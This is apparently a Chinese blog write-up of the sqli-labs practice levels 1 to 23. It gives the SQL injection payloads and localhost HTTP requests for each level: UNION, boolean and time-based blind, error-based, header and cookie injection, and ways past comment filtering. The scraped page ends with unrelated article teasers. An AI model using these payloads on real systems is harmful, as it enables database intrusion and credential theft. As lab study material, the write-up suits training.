sqli-labs Less-1~~~Less-23
Less-1
payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第一关正规的字符型SQL注入,单引号报错,常规注入即可
Less-2
payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第二关数字型SQL注入,直接跟payload即可,通过and 1=1 ,and 1=2发现注入点
Less-3
payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第三关为小括号包裹的字符型注入,发现注入点之后使用payload即可
Less-4
payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第四关为小括号包裹的字符型注入
Less-5
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
布尔盲注脚本:https://www.cnblogs.com/Spec/p/10648793.html
此脚本只将数据库爆出,具体还需要自己更改。
Less-6
payload1(探测长度,以database()为例):"+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):"+and+(select+mid(database(),1,1)='s')--+
同第五关,脚本稍作更改也可使用
Less-7
payload1(探测长度,以database()为例):'))+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
时间盲注,通过if语句判断,争取则延时3秒,否则不延时。
Less-8
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
同第五关
Less-9
payload1(探测长度,以database()为例):'+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
同第七关,单引号字符型延时盲注
Less-10
payload1(探测长度,以database()为例):"+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):"+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Less-11
payload:
POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
常规的post注入,万能密码等。
Less-12
payload:
POST /sqli-labs/Less-12/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-12/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110 uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-13
poc:
POST /sqli-labs/Less-13/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-13/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit
post类型的布尔盲注,密码处通过 or 来判断真假
Less-14
poc:
POST /sqli-labs/Less-14/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-14/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67 uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit
同第十三关
Less-15
payload:
POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-16
poc:
POST /sqli-labs/Less-16/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-16/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit
Less-17
poc:
POST /sqli-labs/Less-17/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-17/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100 uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit
报错注入,之前一直用这个payload:
select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
但一直都不对,知道读源码才知道对长度进行了限制,所以使用这个payload:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
发现报错成功。
Less-18
poc:
POST /sqli-labs/Less-18/ HTTP/1.1
Host: localhost
User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or '
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-18/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit
看源码发现,是将User-Agent未过滤插入数据库中,此时构造报错注入:updatexml(1,concat(0x7e,(SELECT user()),0x7e),1),从而产生sql http头注入。
Less-19
poc:
POST /sqli-labs/Less-19/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit
同第十八关一样,不过登录进去时发现会将referer输出,于是修改referer的值,报错成功。
Less-20
poc:
GET /sqli-labs/Less-20/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=admin' and 1=2 union select user(),version(),database()--+
Connection: close
cookie注入,当登录进去时,发现会将User-Anget,referer,cookie输出到页面中,然后刷新,抓包,替换cookie为payload即可。
Less-21
poc:
GET /sqli-labs/Less-21/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==
Connection: close
payload使用base64编码,并且注入点使用单引号和小括号包裹 ')
payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#
Less-22
poc:
GET /sqli-labs/Less-22/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=
Connection: close
payload:admin" and 1=2 union select 1,username,password from security.users limit 0,1--
Less-23
payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00
多次尝试基本确定 # 与 -- 是被过滤掉了的,于是尝试新的注释方法: ;%00 于是注释成功。
sqli-labs Less-1~~~Less-23的更多相关文章
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- SQL注入系列:SQLi Labs
前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- SQLI LABS Challenges Part(54-65) WriteUp
终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...
- SQLI LABS Stacked Part(38-53) WriteUp
这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
- Sqli labs系列-less-5&6 报错注入法(下)
我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...
随机推荐
- guitar pro系列教程(三):Guitar Pro7乐谱页面显示模式设置
大家好,又到了guitar pro系列教程的时间 本章节我们采用图文结合的方式为大家讲解一下guitar pro 7乐谱的页面显示设置,有兴趣的小伙伴都可以进来看看哦.首让我们先看下图: 如上图所示, ...
- tcp连接的三次握手
为什么tcp连接需要三次握手才能建立连接 主要是为了初始化sequence number的初始值,通信的双方要互相通知双方的sequence number,这个要作为以后数据通信的序号,保证以后不会因 ...
- leetcode116. 填充每个节点的下一个右侧指针
给定一个完美二叉树,其所有叶子节点都在同一层,每个父节点都有两个子节点.二叉树定义如下:struct Node { int val; Node *left; Node *right; Node ...
- DevOps Workshop | 代码管理入门:基于代码扫描实现团队效率提升
CODING「DevOps Workshop 学习营地」持续火热进行中! 在这里,你可以轻松实践 DevOps 全流程.体验高效的云端开发.赢取精美礼品--第二期大奖「戴尔 U2718Q 显示器」将于 ...
- flink:StreamExecutionEnvironment、DataStream和Transformation与StreamOperator
1.StreamExecutionEnvironment: StreamExecutionEnvironment是构建执行任务环境以及任务的启动的入口,主要具备以下几方面的职责: a.存储全局相关的参 ...
- 基于HAL库的STM32的DSP库详解(附FFT应用)
1 . 建立工程,生成代码时选择包含所有库. 2. 打开 option for target 选择 Target 标签,在code generatio中,将floating point hardw ...
- 如何使用Python 进行数据可视化
微信公众号:码农充电站pro 个人主页:https://codeshellme.github.io 在进行数据分析的时候,经常需要将数据进行可视化,以方便我们对数据的认识和理解. 0,Matplotl ...
- python办公入门7:xlwt
xlwt写入excel步骤 创建工作簿 创建工作表 填充工作表内容 保存文件 1 import xlwt 2 3 #创建工作簿 4 wb=xlwt.Workbook() 5 #创建工作表 6 ws=w ...
- 这次我让你彻底弄懂 RESTful
微信搜 「yes的练级攻略」干货满满,不然来掐我,回复[123]一份20W字的算法刷题笔记等你来领.欢迎分享,转载请保留出处. 本文已收录至 https://github.com/yessimida/ ...
- JZOJ2020年10月5日提高B组反思
2020年10月5日提高B组反思 T1 考试的时候想简单了 觉得把跟没有攻占的点相连的边留下就可以了 没有考虑到最小 WA&RE 10 T2 没有思路 就直接从中间往后枚举分解处 蜜汁错误 W ...